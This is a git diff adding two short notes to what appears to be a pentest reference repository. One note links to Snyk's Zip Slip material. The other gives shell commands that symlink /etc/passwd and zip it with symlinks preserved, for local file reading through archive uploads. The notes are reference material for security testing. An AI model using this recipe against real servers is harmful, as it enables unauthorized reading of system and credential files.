diff --git a/Exploits/Compression/Zip Slip.md b/Exploits/Compression/Zip Slip.md new file mode 100644 index 0000000..e311d54 --- /dev/null +++ b/Exploits/Compression/Zip Slip.md @@ -0,0 +1,3 @@ +# Zip Slip + +* [snyk's ZipSlip repository](https://github.com/snyk/zip-slip-vulnerability) diff --git a/Exploits/Compression/Zip Symlink.md b/Exploits/Compression/Zip Symlink.md new file mode 100644 index 0000000..572cbcc --- /dev/null +++ b/Exploits/Compression/Zip Symlink.md @@ -0,0 +1,16 @@ +# Zip Symlink + +https://effortlesssecurity.in/zip-symlink-vulnerability/ + +The exploit is a method of using LFI through an uploaded symlink compressed inside a zip file. +Create a symlink and put it in a zip file. + +```sh +ln -s /etc/passwd link.name +``` + +compress it leaving symlinks intact + +```sh +zip -r --symlinks mal.zip link.name +```